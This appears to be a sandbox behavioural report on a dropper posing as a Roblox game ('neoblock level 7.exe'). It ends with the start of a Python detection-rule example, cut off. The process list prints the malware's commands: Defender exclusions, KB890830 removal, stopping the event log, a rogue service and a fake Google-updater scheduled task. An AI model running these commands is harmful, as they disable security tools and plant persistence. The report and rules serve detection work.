Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2372 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe
PID 2372 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe
PID 2372 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe
PID 4964 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4964 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4964 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4964 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe
PID 4964 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe
PID 4964 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe
PID 4964 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe
PID 4964 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe
PID 2372 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe
PID 2372 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 3024 wrote to memory of 648 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 3024 wrote to memory of 704 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 3024 wrote to memory of 1004 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 552 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 3024 wrote to memory of 732 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 760 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 704 wrote to memory of 2688 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 704 wrote to memory of 2688 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 2136 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2136 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 704 wrote to memory of 2688 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 3024 wrote to memory of 1088 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1100 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1212 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1256 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1288 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1364 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1372 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1424 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1616 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1640 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1664 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1672 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1756 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1792 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1852 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1908 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2016 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2028 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1840 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2108 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2220 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 3024 wrote to memory of 2364 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2432 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2536 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2544 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2596 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2668 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2688 N/A C:\Windows\system32\dialer.exe C:\Windows\sysmon.exe
PID 3024 wrote to memory of 2700 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2708 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe

"C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAeQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAYQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAawBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdQBwACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe

"C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAawBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAaABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Roblox.exe

"C:\Users\Admin\AppData\Local\Temp\Roblox.exe"

C:\Users\Admin\AppData\Local\Temp\ccccc.exe

"C:\Users\Admin\AppData\Local\Temp\ccccc.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "HGJYCZBA"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "HGJYCZBA" binpath= "C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe" start= "auto"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "HGJYCZBA"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe

C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gnbixakp#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gnbixakp#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe

"C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\pcaui.exe

C:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 496 -p 2868 -ip 2868

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2868 -s 460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4292 -ip 4292

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 1484

C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe

"C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1456 -ip 1456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 2092
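The command lines above are the part of this report a detection engineer acts on: Defender exclusions added with Add-MpPreference, the Malicious Software Removal Tool (KB890830) uninstalled through wusa, a scheduled task named to look like Google's updater but pointing at C:\Program Files\Google\Chrome\updater.exe, a PowerShell command prefixed with a throw-away <#...#> comment, a randomly named service started with sc.exe, and dialer.exe launched repeatedly with no arguments. The Python below is an added example, not part of the sandbox report: it encodes those observations as command-line rules and runs them over lines copied from the process list above (the Register-ScheduledTask branch is abridged, and one benign conhost line is included as a negative case). Google's own updater registers the tasks GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA; that allow-list, the rule names and the eight-uppercase-letter service-name heuristic are this example's assumptions, not something the report states.

```python
import re

# Command lines copied from the process list of this report (behavioral2).
# The Register-ScheduledTask branch is abridged; the last line is a benign
# conhost launch kept as a negative case.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\sc.exe start "HGJYCZBA"',
    r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
    r"-ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gnbixakp#> "
    r'IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") '
    r"{ schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' "
    r"/tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask "
    r"-Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') "
    r"-TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }",
    r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart",
    r'C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"',
    r"C:\Windows\System32\dialer.exe",
    r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
]

# Task names Google's updater actually registers (assumption of this example).
LEGIT_GOOGLE_TASKS = {"GoogleUpdateTaskMachineCore", "GoogleUpdateTaskMachineUA"}

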